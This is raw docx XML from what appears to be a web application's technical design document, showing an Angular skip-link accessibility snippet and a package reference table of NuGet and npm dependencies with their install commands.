    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a href="#main-content" class="skip-link"&gt;Skip to main content&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;app-navbar&gt;&lt;/app-navbar&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;main id="main-content" role="main"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;router-outlet&gt;&lt;/router-outlet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;app-toast&gt;&lt;/app-toast&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">/* Add to styles.css: */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.skip-link {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    position: absolute;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    top: -40px;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    left: 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    background: var(--brand-primary);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    color: white;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    padding: 8px 16px;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    border-radius: 0 0 var(--radius-md) 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    text-decoration: none;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    font-weight: 600;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    z-index: 99999;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    transition: top 0.2s;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.skip-link:focus { top: 0; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec9" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 9 — Package Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec9-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1  NuGet Packages (Backend)</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2760"/>
        <w:gridCol w:w="2400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Install Command</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AspNetCoreRateLimit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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5.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Auth endpoint rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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dotnet add package AspNetCoreRateLimit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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MediatR.Extensions.Microsoft.DependencyInjection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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12.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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CQRS command/query pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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dotnet add package MediatR.Extensions...</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EFCore.BulkExtensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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8.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Bulk Excel import (500 rows in &lt;200ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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dotnet add package EFCore.BulkExtensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Microsoft.Extensions.Caching.StackExchangeRedis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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8.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Redis distributed cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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dotnet add package ...StackExchangeRedis</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Sentry.AspNetCore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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4.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Error monitoring &amp; alerting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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dotnet add package Sentry.AspNetCore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Polly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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8.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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HTTP resilience — Gemini API retries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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dotnet add package Polly</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QuestPDF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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2024.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Tax summary PDF report generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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dotnet add package QuestPDF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Hangfire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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1.8.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Replace IHostedService scheduler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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dotnet add package Hangfire.SqlServer</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Asp.Versioning.Mvc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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8.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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API versioning support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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dotnet add package Asp.Versioning.Mvc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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FluentAssertions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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6.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Expressive test assertions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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dotnet add package FluentAssertions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec9-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2  npm Packages (Frontend)</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760"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Install Command</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@ngrx/store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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17.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Predictable state management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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npm i @ngrx/store</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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@ngrx/effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
